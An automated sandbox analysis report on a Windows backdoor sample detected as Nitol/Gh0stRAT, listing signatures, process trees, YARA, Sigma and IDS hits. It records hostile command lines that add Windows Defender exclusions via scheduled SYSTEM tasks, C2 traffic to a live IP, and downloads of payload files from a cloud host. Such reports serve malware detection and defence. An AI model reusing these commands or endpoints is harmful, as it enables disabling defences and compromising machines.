Windows Analysis Report
2o63254452-763487230.06.exe

Overview

General Information

Sample name: 2o63254452-763487230.06.exe
Analysis ID: 1586401
MD5: 0c3951cfe848ead37f11600ee5195006
SHA1: 1f8a4240b5775c7d7c91c0bb48cf2a52df246f5c
SHA256: b0f951ad23e146280e4cdda33f3eb97c99baede4e8429c4366d84971bf8aaeaa
Tags: backdoor, exe, silverfox, winos, user-zhuzhu0009
Infos:

Detection

Nitol
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Nitol
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list (Registry)
Creates an undocumented autostart registry key
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Sigma detected: Windows Defender Exclusions Added - Registry
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • 2o63254452-763487230.06.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\2o63254452-763487230.06.exe" MD5: 0C3951CFE848EAD37F11600EE5195006)
  • BEqRkb.exe (PID: 8164 cmdline: C:\Users\user\Documents\BEqRkb.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • BEqRkb.exe (PID: 8188 cmdline: C:\Users\user\Documents\BEqRkb.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • BEqRkb.exe (PID: 5776 cmdline: C:\Users\user\Documents\BEqRkb.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
    • cmd.exe (PID: 7320 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4460 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 1196 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7660 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 3608 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3752 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5076 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7772 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 2212 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7876 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7896 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 2080 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 5720 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1508 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6236 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6436 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • 2dHqG0.exe (PID: 5576 cmdline: "C:\Program Files (x86)\2dHqG0\2dHqG0.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
      • cmd.exe (PID: 4076 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5820 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 7708 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 1860 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 7848 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 7928 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 7912 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 6412 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 7016 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • 2dHqG0.exe (PID: 5268 cmdline: "C:\Program Files (x86)\2dHqG0\2dHqG0.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • pw8XjN.exe (PID: 6112 cmdline: "C:\Program Files (x86)\8srsV\pw8XjN.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • 2dHqG0.exe (PID: 8084 cmdline: "C:\Program Files (x86)\2dHqG0\2dHqG0.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • pw8XjN.exe (PID: 7624 cmdline: "C:\Program Files (x86)\8srsV\pw8XjN.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • pw8XjN.exe (PID: 2520 cmdline: "C:\Program Files (x86)\8srsV\pw8XjN.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • 2dHqG0.exe (PID: 940 cmdline: "C:\Program Files (x86)\2dHqG0\2dHqG0.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Nitol | Yara detected Nitol | Joe Security
00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Nitol | Yara detected Nitol | Joe Security
Process Memory Space: 2dHqG0.exe PID: 5576 | JoeSecurity_Nitol | Yara detected Nitol | Joe Security
Process Memory Space: 2dHqG0.exe PID: 5576 | PlugXStrings | PlugX Identifying Strings | Seth Hardy
  • 0x1acb8:$Dwork: d:\work
  • 0x4f077:$Dwork: d:\work
  • 0x11b35d:$Dwork: d:\work
  • 0x1177c4:$Shell6: Shell6
  • 0x1185a3:$Shell6: Shell6

Source | Rule | Description | Author | Strings
40.2.2dHqG0.exe.10000000.8.unpack | JoeSecurity_Nitol | Yara detected Nitol | Joe Security
40.2.2dHqG0.exe.38003e8.6.raw.unpack | JoeSecurity_Nitol | Yara detected Nitol | Joe Security
40.2.2dHqG0.exe.38003e8.6.unpack | JoeSecurity_Nitol | Yara detected Nitol | Joe Security
4.2.BEqRkb.exe.27f0000.1.unpack | INDICATOR_SUSPICIOUS_DisableWinDefender | Detects executables containing artifcats associated with disabling Widnows Defender | ditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
5.2.BEqRkb.exe.27a0000.1.unpack | INDICATOR_SUSPICIOUS_DisableWinDefender | Detects executables containing artifcats associated with disabling Widnows Defender | ditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath

              System Summary

              Source: Process started | Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\BEqRkb.exe, ParentImage: C:\Users\user\Documents\BEqRkb.exe, ParentProcessId: 5776, ParentProcessName: BEqRkb.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 7320, ProcessName: cmd.exe
              Source: Process started | Author: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5820, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 7708, ProcessName: reg.exe
              Source: Registry Key set | Author: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 7708, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData
              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2025-01-09T01:54:52.568223+0100 | 2852901 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50017 | 47.243.243.58 | 8917 | TCP
              2025-01-09T01:54:54.716580+0100 | 2852901 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50018 | 47.243.243.58 | 8917 | TCP
              2025-01-09T01:54:56.812545+0100 | 2852901 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50019 | 47.243.243.58 | 8917 | TCP
              2025-01-09T01:54:59.807839+0100 | 2852901 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50020 | 47.243.243.58 | 8917 | TCP
              2025-01-09T01:55:02.654024+0100 | 2852901 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50021 | 47.243.243.58 | 8917 | TCP


              AV Detection

              Source: C:\Program Files (x86)\8srsV\tbcore3U.dll | Avira: detection malicious, Label: TR/Redcap.vdzex
              Source: C:\Program Files (x86)\2dHqG0\tbcore3U.dll | Avira: detection malicious, Label: TR/Redcap.vdzex
              Source: 2o63254452-763487230.06.exe | Virustotal: Detection: 11%
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Program Files (x86)\8srsV\tbcore3U.dll | Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\2dHqG0\tbcore3U.dll | Joe Sandbox ML: detected

              Compliance

              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe | Unpacked PE file: 40.2.2dHqG0.exe.2540000.3.unpack
              Source: unknown | HTTPS traffic detected: 59.110.190.44:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.4:50010 version: TLS 1.2
              Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: 2dHqG0.exe, 00000028.00000002.3513701464.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3514252671.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe, 00000028.00000000.3214205263.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe, 00000029.00000002.3248013208.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe, 00000029.00000000.3240358460.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, pw8XjN.exe, 0000002A.00000000.3243643193.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, pw8XjN.exe, 0000002A.00000002.3251689620.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, 2dHqG0.exe, 0000002D.00000000.3262531939.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe, 0000002D.00000002.3274838743.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, pw8XjN.exe, 0000002E.00000002.3274822445.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, pw8XjN.exe, 0000002E.00000000.3265224479.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, pw8XjN.exe, 0000002F.00000000.3373599420.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, pw8XjN.exe, 0000002F.00000002.3379229347.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, 2dHqG0.exe, 00000030.00000002.3386248776.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe, 00000030.00000000.3380355601.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe.7.dr, pw8XjN.exe.40.dr
              Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
              Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, BEqRkb.exe, 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp, BEqRkb.exe, 00000004.00000000.2265682349.0000000140014000.00000002.00000001.01000000.00000008.sdmp, BEqRkb.exe, 00000005.00000000.2272964825.0000000140014000.00000002.00000001.01000000.00000008.sdmp, BEqRkb.exe, 00000005.00000002.2278285025.0000000140014000.00000002.00000001.01000000.00000008.sdmp, BEqRkb.exe, 00000007.00000000.2775277441.0000000140014000.00000002.00000001.01000000.00000008.sdmp

              Change of critical system settings

              Source: C:\Windows\System32\reg.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramData
              Source: C:\Windows\System32\reg.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users
              Source: C:\Windows\System32\reg.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)
              Source: C:\Windows\System32\reg.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\Documents
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
              Source: C:\Users\user\Documents\BEqRkb.exe | Code function: 4_2_00007FFE1A51A1B8 FindFirstFileExW,4_2_00007FFE1A51A1B8
              Source: C:\Users\user\Documents\BEqRkb.exe | File opened: C:\Users\user\AppData\Roaming
              Source: C:\Users\user\Documents\BEqRkb.exe | File opened: C:\Users\user
              Source: C:\Users\user\Documents\BEqRkb.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
              Source: C:\Users\user\Documents\BEqRkb.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
              Source: C:\Users\user\Documents\BEqRkb.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
              Source: C:\Users\user\Documents\BEqRkb.exe | File opened: C:\Users\user\AppData
              Source: C:\Users\user\Documents\BEqRkb.exe | Code function: 4x nop then mov rax, qword ptr [rsp+78h] | 4_2_000000014000DFFE
              Source: C:\Users\user\Documents\BEqRkb.exe | Code function: 4x nop then mov rax, qword ptr [rsp+78h] | 4_2_000000014000DDFF
              Source: C:\Users\user\Documents\BEqRkb.exe | Code function: 4x nop then movsxd rbx, qword ptr [r14+10h] | 4_2_0000000140011270
              Source: C:\Users\user\Documents\BEqRkb.exe | Code function: 4x nop then mov rax, qword ptr [rsp+78h] | 4_2_000000014000DE96
              Source: C:\Users\user\Documents\BEqRkb.exe | Code function: 4x nop then mov rax, qword ptr [rsp+78h] | 4_2_000000014000DEFB
              Source: C:\Users\user\Documents\BEqRkb.exe | Code function: 4x nop then mov rax, qword ptr [rsp+78h] | 4_2_000000014000E178
              Source: C:\Users\user\Documents\BEqRkb.exe | Code function: 4x nop then mov rax, qword ptr [rsp+78h] | 4_2_000000014000DDD9

              Networking

              Source: Network traffic | Suricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.4:50018 -> 47.243.243.58:8917
              Source: Network traffic | Suricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.4:50017 -> 47.243.243.58:8917
              Source: Network traffic | Suricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.4:50020 -> 47.243.243.58:8917
              Source: Network traffic | Suricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.4:50019 -> 47.243.243.58:8917
              Source: Network traffic | Suricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.4:50021 -> 47.243.243.58:8917
              Source: global traffic | TCP traffic: 192.168.2.4:50017 -> 47.243.243.58:8917
              Source: Joe Sandbox View | IP Address: 118.178.60.9
              Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
              Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknown | TCP traffic detected without corresponding DNS query: 47.243.243.58
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic HTTP traffic detected: GET /i.dat HTTP/1.1 User-Agent: GetData Host: a8mw1y.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /a.gif HTTP/1.1 User-Agent: GetData Host: a8mw1y.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /b.gif HTTP/1.1 User-Agent: GetData Host: a8mw1y.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /c.gif HTTP/1.1 User-Agent: GetData Host: a8mw1y.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /d.gif HTTP/1.1 User-Agent: GetData Host: a8mw1y.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /s.dat HTTP/1.1 User-Agent: GetData Host: a8mw1y.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /s.jpg HTTP/1.1 User-Agent: GetData Host: a8mw1y.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
